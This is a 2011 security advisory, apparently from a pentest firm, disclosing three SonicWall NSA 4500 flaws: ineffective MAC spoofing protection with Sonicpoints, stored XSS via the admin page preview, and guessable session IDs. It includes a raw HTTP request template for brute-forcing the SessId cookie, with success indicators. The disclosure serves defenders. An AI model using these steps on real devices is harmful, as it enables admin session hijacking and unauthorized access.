Multiple vulnerabilities in SonicWall

[hvazquez () pentest es]

While pentesting a a WIFI network on a customer, we found some vulnerabilities in the SonicWall NSA 4500. You can find 
details here:

http://www.pentest.es/vulns_sonicpoint.txt

--------------------------------------------------
Title:
======

SonicWall products with incompatible MAC spoofing protection


Date:
=====
2011-09-29


Introduction:
=============

The SonicWall NSA 4500 product has a MAC spoofing protection option that can be activated in wireless networks per 
ESSID basis. This protection will not work if the acces point is a Sonicpoint. No warning or notice is presented to the 
administrator, wich means that protection will be active but not working. This vulnerability has been detected while 
pentesting a customer WIFI deployment with that configuration: SonicWall NSA  4500 + SonicWall Sonicpoints.


Report-Timeline:
================
2011-09-26:     Vendor Notification
2011-09-28:     Vendor Final Response

The vendor has confirmed the bug via customer support response. 


Affected Products:
==================

SonicWall NSA 4500 + SonicWall Sonicpoints


Exploitation-Technique:
=======================

Common ARP spoofing attacks.


Severity:
=========

High. Customers don't know they are unprotected even if they have the MAC spoofing activated.


Details:
========



--------------------------------------------------

Title:
======

SonicWall web admin interface múltiple code injection vulnerabilities


Date:
=====
2011-09-29


Introduction:
=============

The SonicWall NSA 4500 web admin interface offers the option of customize some web pages directly from the admin 
interface. For this, the web interface has some forms where the admin can put the code and test it via a preview 
feature. This preview feature will show the page and execute all the javascript code inside it in the web admin 
security context, wich leads to many traditional attacks, like XSS, session hijacking...


Report-Timeline:
================

Not reported.


Affected Products:
==================

SonicWall NSA 4500


Exploitation-Technique:
=======================

Common code injection techniques (XSS)


Severity:
=========

Medium. 


Details:
========

To reproduce the flaw, just go to main.html, Users->Settings and in the "Login page content" put whatever code you want 
and it will be executed in the admin context. This behaviour is a dangerous feature of the web admin interface, because 
it can be exploited and triggered in several ways by an attacker. There are other fields other than "Login page 
content" that can be exploited in the same way.

--------------------------------------------------


Title:
======

SonicWall weak HTTP session ID's


Date:
=====
2011-09-29


Introduction:
=============

The SonicWall NSA 4500 web admin interface generates session ID's that are stored in the "SessId" cookie variable. The 
ID's are guessable via brute force, wich leads to admin session hijacking.


Report-Timeline:
================

Not reported.


Affected Products:
==================

SonicWall NSA 4500


Exploitation-Technique:
=======================

To brute force, just make requests like this:


GET /log.wri HTTP/1.0
Host: 123.123.123.123
Connection: close
User-Agent: brute-forcing
Cookie: SessId=111111111

Where SessId is the variable that we are bruteforcing -it should change in every request- and Host is the SonicWall IP.


If you fail you get a 404 HTTP response. If you succeed, you will get a 200 HTTP response, and will see the SonicWall 
logs.


Severity:
=========

Medium. 


Details:
========

HTTP "SessId" bruteforce. From a LAN, 10% of all ID's can be bruteforced in 1 day. The more administrator are logged 
the more dangerous is the scenario, and easier is the brute force attack.
--------------------------------------------------

info () pentest es 
Hugo Vázquez Caramés
PENTEST Consultores